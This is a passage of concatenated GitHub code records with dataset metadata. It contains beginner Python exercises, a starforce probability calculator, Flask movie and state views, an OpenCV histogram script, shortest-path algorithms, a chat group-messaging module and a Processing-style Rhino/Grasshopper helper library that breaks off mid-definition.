finished')\n\n# for n in range(1, 5):\n# print('n =', n)\n\n# print('loop finished')\n\n\n# for n in range(1,4):\n# for j in ['a', 'b', 'c']:\n# print('n = {}'.format(n), 'and j = {}'.format(j))\n\n# for n in range(2,11):\n# print(n)\n\n# n = 2\n# while n < 11:\n# print(n)\n# n += 1\n\n# def doubles(num):\n# for n in range(1,4):\n# num = num * 2\n# print(num)\n# return num\n\n# print(doubles(2))\n\n# print(1 <= 1)\n# #True\n# print(1 != 1)\n# #False\n# print(1 != 2)\n# #True\n# print('good' != 'bad')\n# #True\n# print('good' != 'Good')\n# #True\n# print(123 == '123')\n# #False\n\n\n# def cube(num):\n# return num **c\n\n\ndef input(word):\n stored_word = str(word)\n if len(stored_word) < 5:\n print('word is less than 5 letters')\n elif len(stored_word) == 5:\n print('word has 5 letters')\n else:\n print('word has more than 5 letters')\n\ninput('turkey')\n","repo_name":"winniecluk/RealPythonExercises","sub_path":"exercises2.py","file_name":"exercises2.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30242280966","text":"import pandas as pd\nimport numpy as np\n\nclass StarforceCalculator:\n def __init__(self, start = 0, end = 30, \n scroll = None, ward = None, lucky = None, click = None):\n # 30 >= end > start >= 0\n # scroll, ward, lucky have to be lists if provided\n self.start = start\n self.end = end\n \n self.scroll = [bool(s) for s in scroll] if scroll!= None else scroll\n self.ward = [bool(s) for s in ward] if ward!= None else ward\n self.lucky = [bool(s) for s in lucky] if lucky!= None else lucky\n self.click = [bool(s) for s in click] if click!= None else click\n \n self.table = None\n \n \n def create_table(self):\n starforce_state = list(range(31)) \n #must add 20 more states (destroyed states)\n \n increase = np.array([100 - i*5 for i in range(20)] + [1]*10)/100 \n decrease = np.array([0]*10 + [10,10,15,15,20,20,25,25,30,30]+ [40]*5 + [45]*5)/100\n destroy = np.array([0]*10 + [5]*10 + [10]*5 + [15]*5)/100\n if self.click != None:\n increase = np.minimum(np.array(self.click)*0.05 + increase,1)\n if self.lucky != None:\n \tincrease = np.minimum(np.array(self.lucky)*0.1 + increase,1)\n \n \n same = 1 - increase - decrease - destroy\n cost = np.array([0.01,0.015,0.03,0.055,0.1,0.18,0.27,0.36,0.45,0.54,\n 0.56,0.64,0.72,0.8,1.2,1.6,2,2.4,2.8,3.2,3.6,\n 4,4.8,5.6,6.4,8.1,9,13.5,18,20.7])\n table = pd.DataFrame(list(zip(starforce_state,increase,\n same,decrease,destroy,cost)))\n table.columns = ['state','increase','same','decrease','destroy','cost']\n\n if self.scroll != None:\n table.loc[self.scroll,'same'] = table.iloc[self.scroll]['decrease'] + table.iloc[self.scroll]['same']\n table.loc[self.scroll,'decrease'] = 0\n if self.ward != None:\n table.loc[self.ward,'same'] = table.iloc[self.ward]['destroy'] + table.iloc[self.ward]['same']\n table.loc[self.ward,'destroy'] = 0\n #now we have to restrict based on start and endif \n table = table[(table['state'] < self.end) & (table[\"state\"] >= min(self.start, 9))]\n \n self.table = table\n \n def transient(self):\n part1 = np.diag(self.table['increase'].values[:-1],1)\n part1 += np.diag(self.table['same'].values + self.table['destroy'].values)\n part1 += np.diag(self.table['decrease'].values[1:],-1)\n self.TMatrix = part1\n\n def get_counts(self):\n Cinv = np.eye(self.TMatrix.shape[0])-self.TMatrix\n \n b = np.zeros(self.TMatrix.shape[0])\n b[max(self.start-9, 0)] = 1\n self.CMatrix = np.linalg.solve(Cinv.T, b) \n \n \n def get_state_counts(self):\n tol = 1e-5\n self.CMatrix = self.CMatrix * (np.abs(self.CMatrix) > tol)\n if self.start < 10:\n self.NScount = self.CMatrix[:(self.end-self.start)]\n self.DScount = self.CMatrix[(self.end-self.start):]\n else:\n self.NScount = self.CMatrix[:(self.end-min(9,self.start))]\n self.DScount = self.CMatrix[(self.end-min(9,self.start)):]\n\n self.table['Num Visits'] = list(np.round(self.NScount,2))\n self.table['Num Destroyed'] = np.round(self.table['destroy'] * self.table['Num Visits'],2)\n self.table['Total Cost(M)'] = np.round(self.table['cost'] * self.table['Num Visits'],2)\n \n def print_results(self):\n print(self.table)\n","repo_name":"SLSC94/StarforceCalculator","sub_path":"StarforceCalculator.py","file_name":"StarforceCalculator.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30444332239","text":"\"\"\" Tests for our mutable JSON column type. \"\"\"\n\nfrom datetime import datetime\n\nACCOUNT_ID = 1\n\n\ndef test_mutable_json_type(db, config):\n \"\"\"\n Test that FolderSync._sync_status which is a mutable JSON column is\n updated as expected.\n\n \"\"\"\n from inbox.models.account import Account\n from inbox.models.backends.imap import ImapFolderSyncStatus\n\n account = db.session.query(Account).get(ACCOUNT_ID)\n\n sync_status = db.session.query(ImapFolderSyncStatus).filter_by(\n account_id=ACCOUNT_ID, folder_id=account.inbox_folder_id).one()\n\n original_metrics = sync_status.metrics\n\n metrics = dict(download_uid_count=10,\n queue_checked_at=datetime.utcnow())\n sync_status.update_metrics(metrics)\n\n updated_metrics = sync_status.metrics\n\n metrics.update(original_metrics)\n assert updated_metrics != original_metrics and updated_metrics == metrics,\\\n 'metrics not updated correctly'\n\n # Reupdate status\n new_metrics = dict(delete_uid_count=50,\n download_uid_count=100,\n queue_checked_at=datetime.utcnow())\n sync_status.update_metrics(new_metrics)\n\n latest_metrics = sync_status.metrics\n\n metrics.update(new_metrics)\n assert latest_metrics == metrics, 'metrics not re-updated correctly'\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"tests/general/test_mutable_json_type.py","file_name":"test_mutable_json_type.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"251656643","text":"from client import client\r\nimport threading\r\ngrupos = []\r\n\r\ndef hand_shake_point_2_point(username_of_the_users:list[str],client_send:client,clients:list,group_name:str,signature:str):\r\n lock = threading.Lock()\r\n lock.acquire()\r\n\r\n grupos.append((group_name,username_of_the_users))\r\n #print(grupos)\r\n lock.release()\r\n other_clients = list(filter(lambda x: x.name in username_of_the_users,clients))\r\n #print(list(map(lambda x:\"ONLINE: \"+ x.name,other_clients)))\r\n for o_client in other_clients:\r\n #print(\"ola\")\r\n try:\r\n #print(o_client.encrypt_mesages[1])\r\n #print(client_send.encrypt_mesages[1])\r\n #print(client_send.socket_info)\r\n \r\n client_send.socket_info.send(f\"startHAND{group_name}.|||.{o_client.encrypt_mesages[1]}.|||.{signature}\".encode())\r\n #client_send.socket_info.send(\"ola\".encode())\r\n #print(\"b\")\r\n msg = client_send.socket_info.recv(3072).decode() + f\".|||.{client_send.sign_mesages[1]}\" \r\n #print(f\"{msg} <- ENVIADO\")\r\n #print(o_client.name)\r\n o_client.send_message(msg.encode())\r\n #print(\"enviado\")\r\n except Exception as e:\r\n print(e.args)\r\n \r\n\r\ndef extract_grpup(grupos,nome):\r\n for grupo in grupos:\r\n a,b = grupo\r\n if a == nome:\r\n return b\r\n\r\ndef privateMessaging(group_name:str,message:str,clients:list[client],client_sender:client,sig:str) -> None:\r\n try:\r\n username_of_the_users = extract_grpup(grupos,group_name)\r\n #print(username_of_the_users)\r\n other_clients = list(filter(lambda x: x.name in username_of_the_users,clients))\r\n print(\"BIGBIG\")\r\n message = message + \".|||.\" + sig + \".|||.\" + client_sender.sign_mesages[1]\r\n #print(message)\r\n message = f\"privateMSG{group_name}.|||.{message}.|||.{client_sender.name}\"\r\n for cliente in other_clients:\r\n if cliente.name != client_sender.name:\r\n #print(f\"VALOR DA MSG: {message}\")\r\n cliente.send_message(message.encode('utf-8'))\r\n\r\n except Exception as e:\r\n print(e.args)\r\n\r\ndef talk(message:str,client_sender:client,clients:list[client]) -> None:\r\n group_name, message,sig = message.split(\".__.\")\r\n\r\n privateMessaging(group_name,message,clients,client_sender,sig)","repo_name":"arctumn/Apolircs_PY","sub_path":"src/Server/private_message.py","file_name":"private_message.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"468672388","text":"\nfrom application import app, db\nfrom flask_login import login_required, current_user\n\nfrom flask import redirect, render_template, request, url_for\nfrom application.movies.models import Movie\nfrom application.movies.forms import MovieForm\nfrom application.ratings.models import Rating\nfrom application.roles.models import Role\nfrom application.persons.models import Person\nfrom application.persons_role_in_movie.forms import PersonsRoleInThisMovieForm\nfrom application.persons_role_in_movie.models import PersonsRoleInMovie\n\n\n\n@app.route(\"/movies\", methods=[\"GET\"])\ndef movies_index():\n return render_template(\"movies/list.html\", movies = Movie.query.all())\n\n@app.route(\"/movies//\", methods=[\"GET\"])\ndef movies_get_movie(movie_id):\n m = Movie.query.get(movie_id)\n r = Rating.find_movie_avg(movie_id)\n r_count = Rating.get_count_of_ratings_in_movie(movie_id)\n credits = PersonsRoleInMovie.get_credits(movie_id) \n if r == None:\n return render_template(\"movies/movie.html\",movie = m, form = MovieForm(), rating=r, rating_count = r_count, credits = credits)\n else:\n r = round(r,2)\n return render_template(\"movies/movie.html\",movie = m, form = MovieForm(), rating=r, rating_count = r_count, credits = credits)\n\n\n \n\n@app.route(\"/movies/new/\")\n@login_required\ndef movies_form():\n form = MovieForm(request.form)\n return render_template(\"movies/new.html\", form = MovieForm())\n\n\n@app.route(\"/movies/\", methods=[\"POST\"])\n@login_required\ndef movies_create():\n form = MovieForm(request.form)\n if not form.validate():\n return render_template(\"movies/new.html\", form = form)\n\n n = form.name.data\n d = form.duration.data\n b = form.budget.data\n y = form.year.data\n m = Movie(n, d, b,y)\n m.account_id = current_user.id\n db.session().add(m)\n db.session().commit()\n return redirect(url_for(\"movies_index\"))\n\n\n@app.route(\"/movies//add_credits/\", methods=[\"GET\"])\ndef movie_add_credits_index(movie_id):\n form = PersonsRoleInThisMovieForm(request.form)\n movie = Movie.query.get(movie_id)\n return render_template(\"movies/movieaddcredits.html\", movie = movie, roles = Role.query.all(), persons = Person.query.all(), form = form)\n\n@app.route(\"/movies//add_credits/\", methods=[\"POST\"])\ndef movie_add_credits(movie_id):\n form = PersonsRoleInThisMovieForm(request.form)\n role = form.roles.data\n person = form.persons.data\n movie = Movie.query.get(movie_id)\n s = PersonsRoleInMovie(movie=movie,role=role, person=person)\n db.session.add(s)\n db.session.commit()\n return redirect(url_for(\"movie_add_credits_index\", movie_id = movie_id))\n\n@app.route(\"/movies//update/\", methods=[\"GET\"])\ndef movie_update_index(movie_id):\n m = Movie.query.get(movie_id)\n form = MovieForm(request.form)\n form.name.data = m.name\n form.budget.data = m.budget\n form.duration.data = m.duration\n form.year.data = m.year\n return render_template(\"movies/edit.html\", movie = m, form = form)\n\n\n@app.route(\"/movies//update/\", methods=[\"POST\"])\ndef movie_update(movie_id):\n m = Movie.query.get(movie_id)\n form = MovieForm(request.form)\n m.name = form.name.data\n m.budget = form.budget.data\n m.year = form.year.data\n m.duration = form.duration.data\n db.session().commit()\n return redirect(url_for(\"movies_get_movie\", movie_id = m.id))\n\n@app.route(\"/movies//delete/\", methods=[\"POST\"])\ndef movie_delete(movie_id):\n m = Movie.query.get(movie_id)\n Rating.query.filter(Rating.movie_id == movie_id).delete()\n db.session().delete(m)\n db.session().commit()\n return redirect(url_for(\"movies_index\"))\n\n@app.route(\"/movies//delete_credit/\", methods=[\"POST\"])\ndef movie_delete_credit(movie_id, credit_id):\n c = PersonsRoleInMovie.query.get(credit_id)\n db.session().delete(c)\n db.session().commit()\n return redirect(url_for(\"movies_get_movie\", movie_id = movie_id))","repo_name":"veliblesku/elokuvatietokanta","sub_path":"application/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69955523735","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\n\ndef plot_histogram(image, title, mask = None):\n channels = cv2.split(image)\n colors = ('b','g','r')\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Bins\")\n plt.ylabel(\"Pixels\")\n\n for (channel, color) in zip(channels, colors):\n hist = cv2.calcHist([channel],[0], mask, [256], [0,256])\n plt.plot(hist,color = color)\n plt.xlim([0,256])\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"image path\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args['image'])\ncv2.imshow('DREAM', image)\nplot_histogram(image, \"Histogram for DREAM\")\n\nmask = np.zeros(image.shape[:2], dtype = \"uint8\")\ncv2.rectangle(mask,(92,95),(315,325),255,-1)\ncv2.imshow(\"THAT'S WHAT THE POINT OF THE MASK IS\", mask)\n\nmasked = cv2.bitwise_and(image,image,mask = mask)\ncv2.imshow(\"no one cared who i was until i put on the mask\", masked)\n\nplot_histogram(image, \"Histogram for Masked Image\", mask = mask)\nplt.show()\ncv2.waitKey(0)\n","repo_name":"Joekstr/OpenCVPractice","sub_path":"ch7/histogram_with_mask.py","file_name":"histogram_with_mask.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4030119271","text":"import heapq\n\n# Finds the shortest path from a single node A to all other nodes in a the graph\n# Dijkstra's algorithm does not support negative edge weights, because will keep updating minimum paths ( looping )\n# O(E + V log V)\ndef dijkstra(graph, initial_node):\n distances = { node: float('inf') for node in graph } # Matrix of distances\n distances[initial_node] = 0\n to_visit = [ (0, initial_node) ]\n\n while to_visit:\n c_distance, node = heapq.heappop(to_visit)\n\n if c_distance > distances[node]: continue\n\n for neighbor, weight in graph[node].items():\n distance = c_distance + weight\n if distance < distances[neighbor]:\n distances[neighbor] = distance\n heapq.heappush(to_visit, (distance, neighbor))\n\n return distances\n\n# Finds the shortests path from a single node to all nodes in the graph\n# The algorithm can detect cycles running E rounds, and if running a new last round reduces any distance, the graph contains a negative cycle\n# O( V * E )\ndef bellman_ford(graph, initial_node):\n distances = { node: float('inf') for node in graph }\n distances[initial_node] = 0\n\n for _ in range(len(graph) - 1):\n for node in graph:\n for neighbor, weight in graph[node].items():\n if distances[node] + weight < distances[neighbor]:\n distances[neighbor] = distances[node] + weight\n\n # checking negative cycles\n for node in graph:\n for neighbor, weight in graph[node].items():\n if distances[node] + weight < distances[neighbor]:\n return -1 # There is a negative cycles\n return distances\n\n# Finds shortest path between ALL node pairs of the graph\n# Handles graphs with negative weights but cannot distinguish between negative weight cycles and reachable nodes\n# O ( V^3 )\ndef floyd_warshall(graph):\n n = len(graph)\n distances = [[float('inf')] * n for _ in range(n)]\n\n for i in range(n): distances[i][i] = 0\n\n for node, neighbors in graph.items():\n for neighbor, weight in neighbors.items():\n distances[node][neighbor] = weight\n\n for k in range(n):\n for i in range(n):\n for j in range(n):\n distances[i][j] = min(distances[i][j], distances[i][k] + distances[k][j])\n\n return distances\n","repo_name":"FedeLochbaum/google-cloud-interview","sub_path":"data-structures-and-algorithms/graph/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38260581856","text":"#!/usr/bin/python3\n\"\"\"states template\n\"\"\"\n\nfrom flask import Flask, render_template\nfrom models import storage\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef current_remove(self):\n \"\"\"request you must close the current SQLAlchemy Session\n \"\"\"\n storage.close()\n\n\n# host:5000/(id)\n@app.route('/states/', strict_slashes=False)\n@app.route('/states/', strict_slashes=False)\ndef display_html(id=None):\n \"\"\"display states Id\n \"\"\"\n data = storage.all(\"State\")\n return render_template('9-states.html', states=data, id=id)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug='True')\n","repo_name":"MiguelP4lacios/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14027200437","text":"import scriptcontext as sc\nimport Rhino\nimport rhinoscriptsyntax as rs\nfrom Rhino.Geometry import * #?\nimport Grasshopper.Kernel.Data.GH_Path as Path\nimport Grasshopper.DataTree as DataTree\nimport time\nimport math\nfrom math import * #!\nPI = math.pi\nconstrain = Rhino.RhinoMath.Clamp\nimport System.Drawing.Color as Color\nimport System.Drawing.Rectangle\nimport pgh.perlin\nfrom random import seed as randomSeed\nfrom random import gauss as randomGaussian\nfrom random import shuffle, choice\nfrom random import uniform\nfrom pgh.interact import *\nSimplex = pgh.perlin.SimplexNoise()\nimport inspect\ndef random(a = 1,b = 0):\n \"random(a,b)->[a,b], random(a)->[0,a], random()->[0,1]\"\n return uniform(a,b)\ndef noise(*args):\n \"Simplex noise 1,2,3d\"\n if len(args) == 1:\n return Simplex.noise2(args[0],0)\n elif len(args) == 2:\n return Simplex.noise2(*args)\n else:\n return Simplex.noise3(*args)\ndef noiseDetial():\n raise NotImplemented\n\nPFLAG = None\n# accessible global var\nwidth = 640\nheight = 800\nP2D = Rhino.Display.DefinedViewportProjection.Top\nP3D = Rhino.Display.DefinedViewportProjection.Perspective\n## global setting\nif \"DISPLAY\" not in sc.sticky:\n sc.sticky[\"DISPLAY\"] = Rhino.Display.CustomDisplay(True)\nDISPLAY = sc.sticky[\"DISPLAY\"]\n_ghenv = None\nall_processing = {}\n## display setting\nclass Style:\n def __init__(self):\n self.IS_FILL = True\n self.FILL_COLOR = Color.FromArgb(255,255,255)\n self.IS_STROKE = True\n self.STROKE_COLOR = Color.FromArgb(1,0,0,0)\n self.STROKE_WEIGHT = 1\nclass Info:\n def __init__(self):\n self.IS_LOOP = True\n self.LOOP_COUNT = 0\n self.TIME = 0\n### dummy placeholder only for import\nSTYLE = Style()\nSTYLESTACK = []\n_SHAPESTACK = []\n_CPLANESTACK = []\nCPLANE = Plane.WorldXY\nAUTO_DISPLAY = True\nGEOMETRY_OUTPUT = True\nCOLOR_OUTPUT = False\nGeoOut = DataTree[object]()\nColorOut = DataTree[Color]()\nINFO = Info()\nVIEWPORT = Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport\n## general setting that persist over different instacnes\nTORLERENCE = Rhino.RhinoDoc.ActiveDoc.PageAbsoluteTolerance\nthisDoc = Rhino.RhinoDoc.ActiveDoc\n# mouse variable that all instances share(not actually shared, but should be diffcult to notice)\n_posInfo = rs.GetCursorPos()\nmouseX = _posInfo[0].X\nmouseY = _posInfo[0].Y\npmouseX = mouseX\npmouseY = mouseY\nmousePressed = False\n_pmousePressed = False\nmouseMoved = False\nmouseDragged = False\nmouseClicked = False\ndef update_mouse():\n global mouseX,screenX,mouseY,screenY,pmouseX,pmouseY,\\\n _pmousePressed,mousePressed,mouseMoved,mouseDragged,mouseClicked\n pmouseX = mouseX\n pmouseY = mouseY\n _pmousePressed = mousePressed\n _posInfo = rs.GetCursorPos()\n screenX = _posInfo[1].X\n screenY = _posInfo[1].Y\n client = thisDoc.Views.ActiveView.ActiveViewport.ClientToWorld(_posInfo[3])\n tup = Intersect.Intersection.LinePlane(client,CPLANE)\n if tup[0]:\n ptOnPlane = client.PointAt(tup[1])\n mouseX = ptOnPlane.X\n mouseY = ptOnPlane.Y\n else:\n mouseX = _posInfo[0].X\n mouseY = _posInfo[0].Y\n #? returned mouseX,Y is based on world coord but ellipse,rect...function is based on CPLANE so\n mouseX -= CPLANE.OriginX\n mouseY -= CPLANE.OriginY\n mousePressed = isMousePressed()\n mouseMoved = pmouseX != mouseX or pmouseY != mouseY\n mouseDragged = mouseMoved and mousePressed\n mouseClicked = _pmousePressed and not mousePressed\n\n\"\"\"\n#useless now\ndef _clear():\n for uniquevar in [var for var in globals().copy() if var[0] != \"_\"]:\n del globals()[uniquevar]\ndef _time_test(fn,arg,time = 1000):\n before = time.clock()\n for i in range(time):\n fn(*arg)\n after = time.clock()\n ms = (after - before)*1000\n print(\"cost %i ms for %i times\"%(ms,count))\n return ms\n\"\"\"\n## helper\ndef convert_polyline(curve):\n \" return a polyline, if convert fail, raise IndexOutOfBound \"\n if isinstance(curve,Polyline):\n return curve\n else:\n nc = curve.ToNurbsCurve()\n return toPolyline(nc).TryGetPolyline()[1]\ndef toPolyline(curve,maxAngleRadians = 0.1, tolerance = 0.1):\n \" simplify ToPolyline buildin \"\n return curve.ToPolyline(0,0,maxAngleRadians,0,0, tolerance,0.01,0,True)\n\n## basic processing function ##\ndef NewView(name,Projection,screenX = 0,screenY = 0,seperate = True):\n \"create a new rhino viewport\"\n exist = Rhino.RhinoDoc.ActiveDoc.Views.Find(name,True)\n if not exist:\n exist = Rhino.RhinoDoc.ActiveDoc.Views.Add(\n name,\n Projection,\n System.Drawing.Rectangle(screenX,screenY,screenX+width,screenY+height),\n seperate)\n viewRect = Rectangle3d(CPLANE,width,height)\n exist.ActiveViewport.ZoomBoundingBox(viewRect.BoundingBox)\n return exist\ndef background(*args):\n \" clear OUTPUT, if has args, set backgound color(a,r,g,b) \"\n if len(args):\n c = color(*args)\n Rhino.ApplicationSettings.AppearanceSettings.ViewportBackgroundColor = c\n _clearOutput()\ndef size(w,h,mode=P2D,name='processing'):\n \" set size of new viewport \"\n global width,height,VIEWPORT\n width = w\n height = h\n VIEWPORT = NewView(name,mode).ActiveViewport\n\ndef toggleColor(state = False):\n \"cancel color out mode\"\n global COLOR_OUTPUT\n COLOR_OUTPUT = state\ndef color(*args):\n \"accept : (gray), (gray,alphy), (r,g,b), (r,g,b,a)\\\n return : Color\"\n length = len(args)\n if length == 1:\n if isinstance(args[0],Color):\n return args[0]\n else:\n return Color.FromArgb(args[0],args[0],args[0])\n elif length == 2:\n return Color.FromArgb(args[1],args[0],args[0],args[0])\n elif length == 3:\n return Color.FromArgb(*args)\n elif length == 4:\n return Color.FromArgb(args[3],args[0],args[1],args[2])\ndef _clearOutput():\n #!! need find a way to dispose display for each\n DISPLAY.Clear()\n DISPLAY.Dispose\n GeoOut.Clear()\n ColorOut.Clear()\ndef Display(anyCurve):\n \" overall display \"\n if GEOMETRY_OUTPUT:\n # add diffrent fill and outline to different GeoOut bracnch\n is_fill = STYLE.FILL_COLOR.A > 0\n is_stroke = STYLE.STROKE_COLOR.A > 0\n i = GeoOut.BranchCount\n if is_stroke:\n GeoOut.Add(anyCurve,Path(i))\n ColorOut.Add(STYLE.STROKE_COLOR,Path(i))\n\n if is_fill:\n GeoOut.Add(_fill_geometry(anyCurve),Path(i))\n ColorOut.Add(STYLE.FILL_COLOR,Path(i))\n if COLOR_OUTPUT:\n _fill_color(anyCurve,STYLE.IS_FILL,STYLE.IS_STROKE)\ndef Fill(curve,colour=None,real = True,brep = False):\n \" rhino version fill \"\n if not colour:\n colour = STYLE.FILL_COLOR\n if real:\n _fill_geometry(curve,brep)\n else:\n _fill_color(curve)\ndef noFill():\n STYLE.FILL_COLOR = Color.FromArgb(0,0,0,0)\ndef fill(*args):\n if isinstance(args[0], Color):\n STYLE.FILL_COLOR = args[0]\n return\n STYLE.FILL_COLOR = color(*args)\ndef _fill_geometry(planar_curve,brep = False):\n if brep:\n planar_curve = planar_curve.ToNurbsCurve()\n return Brep.CreatePlanarBreps(planar_curve)\n else:\n pline = convert_polyline(planar_curve)\n if not pline.IsClosed:\n pline.Add(pline.First)\n return Mesh.CreateFromClosedPolyline(pline)\ndef _fill_color(curve,fill = True,stroke = True):\n pline = convert_polyline(curve)\n DISPLAY.AddPolygon(pline.ToArray(),STYLE.FILL_COLOR,STYLE.STROKE_COLOR,fill,False)\n if stroke:\n DISPLAY.AddCurve(pline.ToNurbsCurve(),STYLE.FILL_COLOR,STYLE.STROKE_WEIGHT)\n\ndef Stroke(curve,colour=None,weight=None):\n if not colour:\n colour=STYLE.STROKE_COLOR\n if not weight:\n weight=STYLE.STROKE_WEIGHT\n c = curve.ToNurbsCurve()\n DISPLAY.AddCurve(c,colour,weight)\ndef stroke(*args):\n if isinstance(args[0], Color):\n STYLE.STROKE_COLOR = args[0]\n return\n STYLE.STROKE_COLOR = color(*args)\ndef noStroke():\n STYLE.STROKE_COLOR = Color.FromArgb(0,0,0,0)\ndef strokeWeight(weight):\n STYLE.STROKE_WEIGHT = weight\ndef pushStyle():\n STYLESTACK.append(STYLE)\ndef popStyle():\n global STYLE\n if STYLESTACK:\n STYLE = STYLESTACK.pop()\n\n### create shape api ###\nclass Shape(Curve):\n def __init__():\n self.shape = super(self,Shape).__init__()\n self.plist = []\ndef createShape():\n return Shape()\ndef beginShape(kind = None):\n #! add fiiled polygon\n _SHAPESTACK.append( (kind,[]) )\ndef vertex(x,y,z=0):\n _SHAPESTACK[-1][1].append(Point3d(x,y,z))\ndef endShape():\n shape = _SHAPESTACK.pop()\n if shape[0]:\n pass\n pline = Polyline(shape[1])\n if AUTO_DISPLAY:\n Display(pline)\n return pline\n\ndef world_to_cplane(pt):\n \"just pt - CPLANE.Origin\"\n return CPLANE.RemapToPlaneSpace(pt)[1]\n### matrix manipulation ###\ndef translate(*args):\n \"translate CPLANE with (x,y,[z]) or Vector3d\"\n if isinstance(args[0],Vector3d):\n CPLANE.Translate(Vector3d)\n else:\n CPLANE.Translate(CPLANE.PointAt(*args)-CPLANE.Origin)\ndef rotate(rad,axis=None,center=None):\n \"return True if success\"\n cplane = CPLANE\n if not axis:\n axis = cplane.ZAxis\n if not center:\n center = cplane.Origin\n return cplane.Rotate(rad,axis,center)\n\ndef pushMatrix():\n _CPLANESTACK.append(Plane(CPLANE))\ndef popMatrix():\n global CPLANE\n if _CPLANESTACK:\n CPLANE = _CPLANESTACK.pop()\ndef setMatrix(plane):\n \"change CPLANE to plane\"\n global CPLANE\n CPLANE = plane\n### time related ###\ndef frameRate(fps):\n ms = 1000/fps\n print(\"Set Timer Interval to : %i ms\" % (ms))\n return ms\ndef millis():\n return int((time.clock() - INFO.TIME)*1000)\n\n# math buildin\ndef dist(pt1,pt2):\n return pt1.DistanceTo(pt2)\ndef map(value,a,b,c,d):\n \"return remap value from (a,b) --> (c,d)\"\n return (value-a)*(d-c)/(b-a) + c\nclass PVector(object):\n \" processing PVector interface as Vector3d \"\n def __init__(self,*args):\n relative = Vector3d(CPLANE.Origin)\n if len(args) == 0:\n self.__data = Vector3d.Zero-relative\n if len(args) == 1:\n self.__data = args[0]\n elif len(args) == 2:\n self.__data = Vector3d(args[0],args[1],0)-relative\n elif len(args) == 3:\n self.__data = Vector3d(*args)-relative\n def __repr__(self):\n return 'PVector'+repr(self.__data)\n def __str__(self):\n return str(self.__data)\n def __getattr__(self,attr):\n return getattr(self.__data,attr)\n def __radd__(self,other_v):\n return PVector(self.__data + other_v)\n def __add__(self,other):\n if isinstance(other,Vector3d):\n return PVector(self.__data + other)\n return PVector(self.__data + other.__data)\n def __sub__(self,other):\n if isinstance(other,Vector3d):\n return PVector(self.__data - other)\n return PVector(self.__data - other.__data)\n def __rsub__(self,other_v):\n return PVector(other_v - self.__data)\n def __div__(self,scalar):\n return PVector(self.__data / scalar)\n def __mul__(self,scalar):\n return PVector(self.__data * scalar)\n def __neg__(self):\n return PVector(-self.__data)\n def __cmp__(self, other):\n return self.__data.CompareTo(other.__data)\n def toVector(self):\n return self.__data\n def toPoint(self):\n return Point3d(self.__data)\n def get(self):\n return self.__data\n def set(self,v):\n self.__data = v\n def mag(self):\n return self.Length\n def add(self,v):\n return self + v\n def sub(self,v):\n return self-v\n def mult(self,s):\n return self*s\n def div(self,s):\n return self/s\n def dot(self,v):\n return self*v\n def cross(self,v):\n return Vector3d.CrossProduct(self,v)\n def normalize(self):\n return self.Unitize()\n def rotate(self,radians):\n self.Rotate(radians,CPLANE.ZAxis)\n def limit(self,s):\n self.Unitize()\n self *= s\n @property\n def x(self):\n return self.X\n @property\n def y(self):\n return self.Y\n @property\n def z(self):\n return self.Z\n @classmethod\n def angleBetween(cls,a,b):\n return Vector3d.VectorAngle(a,b,CPLANE)\n @classmethod\n def random2D(cls):\n theta = uniform(0,2*PI)\n return Vector3d(math.cos(theta),math.sin(theta),0)\n @classmethod\n def random3D(cls):\n z = uniform(-1,1)\n theta = uniform(0,2*PI)\n v = PVector.random2D() * (1-z*z)**0.5\n return Vector3d(v.X,v.Y,z)\n##! TODO:image function\ndef loadImage(fpath):\n \"load image\"\n return Rhino.Display.DisplayBitmap.Load(fpath)\ndef image(img,x,y):\n \"position image\"\n pass\n\n# basic geometry drawing\ndef arc(x,y,w,h,start,stop,mode='PIE'):\n \" construct a elliptic arc \"\n if w == h:\n res = Arc(Circle(CPLANE,w),Interval(start,stop))\n spt = res.StartPoint\n ept = res.EndPoint\n cpt = CPLANE.Origin\n else:\n a = w/2\n b = h/2\n pl = Plane(CPLANE)\n pl.Translate(Vector3d(x,y,0))\n cpt = pl.Origin\n spt = pl.PointAt( a*math.cos(start),b*math.sin(start),0 )\n ept = pl.PointAt( a*math.cos(stop),b*math.sin(stop),0 )\n ellip = Ellipse(pl,a,b).ToNurbsCurve()\n t0 = ellip.ClosestPoint(spt)[1]\n t1 = ellip.ClosestPoint(ept)[1]\n res = ellip.Trim(t0,t1)\n if mode == \"PIE\":\n c1 = LineCurve(ept,cpt)\n c2 = LineCurve(cpt,spt)\n res = Curve.JoinCurves([res,c1,c2])[0]\n Display(res)\ndef line(x1,y1,x2,y2,z1=0,z2=0):\n \" simple line \"\n pl = Plane(CPLANE)\n ln = Line(pl.PointAt(x1,y1,z1),pl.PointAt(x2,y2,z2))\n if AUTO_DISPLAY:\n Display(ln)\n return ln\ndef list_to_point(lst,n=3):\n return [Point3d(*lst[i:i+n]) for i in range(0,len(lst),n)]\ndef curve(*args):\n \"construct 3-degree 